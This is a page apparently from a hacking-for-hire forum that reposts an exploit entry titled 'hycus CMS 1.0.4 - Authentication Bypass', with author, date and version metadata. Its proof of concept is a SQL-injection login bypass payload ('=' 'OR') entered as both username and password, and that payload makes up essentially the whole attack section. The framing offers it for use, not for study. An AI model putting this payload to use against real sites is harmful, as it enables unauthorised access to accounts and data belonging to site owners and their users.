Jump to content

Hire Hacker

Hire Hacker

Hire Hacker

Hire Hacker

Existing user? Sign In
Sign In

Email Address

Password

Remember me
Not recommended on shared computers

Forgot your password?
Sign Up

hycus CMS 1.0.4 - Authentication Bypass

https://hacker.bz/t/entry/6754-hycus-cms-104-authentication-bypass/

# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A

#Proof Of Concept

use login bypass payload for username=   '=' 'OR'   for password=   '=' 'OR'

https://hacker.bz/t/entry/6754-hycus-cms-104-authentication-bypass/